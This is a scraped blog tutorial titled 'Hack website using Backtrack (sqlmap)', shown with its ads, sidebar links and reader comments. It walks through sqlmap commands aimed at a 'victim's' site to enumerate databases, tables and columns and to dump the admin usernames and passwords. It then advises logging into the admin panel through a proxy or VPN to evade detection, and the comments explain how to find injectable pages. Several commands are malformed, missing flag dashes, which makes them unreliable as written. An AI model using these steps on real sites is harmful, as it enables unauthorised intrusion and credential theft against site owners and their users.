Вы находитесь на странице: 1из 5

03/10/2013

Hack website using Backtrack (sqlmap) | Hack For Security

FILLED UNDER: Back track 5, backtrack, Sql injection, Webhacking

Search This Site

Hack website using Backtrack (sqlmap)

LIKE
AND TWEET
advertisements

3
Tw eet

138
Like

Stay Connected :)
HOME CYBER NEWS DEFACEMENTS BACKTRACK TOOLS WEBHACKING DOWNLOAD

HACK FOR SECURITY


Posted By: SiddhartH SolankI on 05:00

Learn Ethical Hacking


www.Koenig-India.com

4,000+

10,000+

200+

300+

Certified Ethical Hacker Courses by Koenig Solution Limited


In my previous tutorial I have explained what is backtrack, now in this tutorial I am going to show you how to hack website using Backtrack 5 (sqlmap). Sqlmap is a automatic sql injection tool which helps you to hack website easily. Follow the simple steps to hack website using backtrack 5 sqlmap tool. 1. Open your backtrack terminal and type cd /pentest/database/sqlmap and hit enter. Now sqlmap is open in your terminal

For Latest news And Updates Sign Up

SIGN UP

We Are On YouTube
siddharth solanki YouTube
9

2. Now find the vulnerable site. (well I already have vulnerable site)

Google+ Followers
SiddhartH SolankI
Add to circles

3. Now type this command in the terminal and hit enter.(refer above figure)

python sqlmap.py -u http://yourvictim'slink/index.php?id=4 dbs 4. Now you will get the database name of the website
93 have me in circles View all

Followers

www.hackforsecurity.net/2012/07/hack-website-using-backtrack-sqlmap.html

1/5

03/10/2013

Hack website using Backtrack (sqlmap) | Hack For Security


Join this site
w ith Google Friend Connect

Members (33) More

Well I got the two database aj and information_schema we will select aj database. 5. Now get the tables of that database. for that you need to enter this command into your terminal and simply hit Enter.

Already a member? Sign in

Popular Posts

Hack facebook account and Gmail account using Backtrack 5

python sqlmap.py -u http://yourvictim'slink/index.php?id=4 -D (database name) tables

Free download super Bluetooth hack for mobile free download IDM with lifetime license Hack website using Backtrack (sqlmap) Hack Facebook passwords-Facebook hacker software [for n00b] Collection of Top 10 Deface page Best SMS Spoofer: Send Fake SMS Sql Poizon ~ Sqli Exploit Scanner Tool Admin finder perl script How to create a bootable pendrive of kali Linux

6. Now we need to grab the tables from the aj database. paste this command bellow command and hit enter.

python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -D aj tables

7. Now you will get the tables list which is stored in aj database.

Labels
admin finder Android Anonymous

backtrack Bangla hacker


download

Back track 5 Defacements

Blogging Books page

cyber attack
hacking

cyber news cyber war deface

exploits

Facebook

facebook

Facebook security Google Hacking Books

Indian hackers keylogger linux News OS Pakistani hackers security SEO shell
tools
Smartphones sms spoofing spoofing Sql
Traffic

hacking

vulnerability

webcam

website hacking windows tricks WordPress xss 8. Now lets grab the columns from the admin table

Webhacking

injection tools

Find us on Facebook

Cyber security

python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin --columns

Like 12,572 people like Cyber security.

Facebook social plugin

Now we got the columns and we got username and password


www.hackforsecurity.net/2012/07/hack-website-using-backtrack-sqlmap.html 2/5

03/10/2013

Hack website using Backtrack (sqlmap) | Hack For Security

9. Now lets grab the passwords of the admin

python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin -U test -dump Now we got the username and the password of the website !

Now just find the admin penal of the website and use proxy/vpn when you are trying to login in the website as a admin. advertisements

Download Free Software


mobogenie.com/download-software

Download Free PC Manager Software. Easy File Transfer. Download Now !


If You Enjoyed This Post Please Take 5 Seconds To Share It.
1 544 39 Blogger 76 Stumble 9 20.8K

Related Posts

Maxsqli syntax maker tool

Sql Poizon ~ Sqli Exploit Scanner T...

SQL INJECTION (From start to Deface...

How to get the passwords hidden beh...

Introduction to Cross Site Scriptin...

NEWER POST

OLDER POST

www.hackforsecurity.net/2012/07/hack-website-using-backtrack-sqlmap.html

3/5

03/10/2013

Hack website using Backtrack (sqlmap) | Hack For Security

9 comments Leave a message...


Best Community P roblem
2 months ago

Share

Avatar

cd /pentest/database/sqlmap No such file or directory :( what is problem ?


Reply Share
Mod

Hac k For S ec urit y

> Problem

2 months ago


Avatar

You might be using older version of the backtrack


Reply Share

k aveh k horram

6 months ago

How do you find the php.?id=(number) on a webpage?


Reply Share
Mod

Hac k For S ec urit y

> kaveh khorram

6 months ago

Just surf the website and find it ;)


Reply Share

k id des t roy er

> Hack For Security


Share
Mod

5 months ago

Bro i Think it will not Work on Every no. which i Find during Surfing, Isn't it ?
Reply

Hac k For S ec urit y

> kid destroyer

5 months ago


Avatar
A mmer A mmar
7 months ago

yup ;)

Reply

Share

Nice Work Man but is it working on all suites or one types ? thnx .. ameer from irq
Reply Share
Mod

Hac k For S ec urit y

> Ammer Ammar

4 months ago


Avatar
P unt oinfinit o

Its working only for sql vulnerable sites !


Reply Share

7 months ago

nice, but one high problem of sqmap.py is that is so slower :( and for do one biggest attack u have to wait a lot ... but anyway that's cool :D
Reply Share

ALSO ON HACK FOR SECURITY

WHA T ' S T HI S ?

How to gain access to unprotected webcams using Google


1 comment 8 months ago

Collection of Top 10 Deface page


1 comment 8 months ago

Galapagos The best deface page is from

mark can't believe it works.. lol

"SMed79" view mirror on http://www.zoneh.com/archive/...

Hack WordPress Blog in easy way


3 comments 8 months ago

Admin finder perl script


1 comment 8 months ago

k nz Because i think it's salted hash, yous

S hofa Nur Hanifa trimakasih sudah share

hsold find somthing that uses salt

admin findernya..

Su b s cri b e

Ad d D i s q u s to yo u r s i te

Home

About Me

Disclamier

Contect Us

Ultimate Blogger Tricks

Learn Photoshop

Advertise With Us

Back To Top

www.hackforsecurity.net/2012/07/hack-website-using-backtrack-sqlmap.html

4/5

03/10/2013

Hack website using Backtrack (sqlmap) | Hack For Security


Hack For Security 2013. All Rights Reserved | Contact | About

www.hackforsecurity.net/2012/07/hack-website-using-backtrack-sqlmap.html

5/5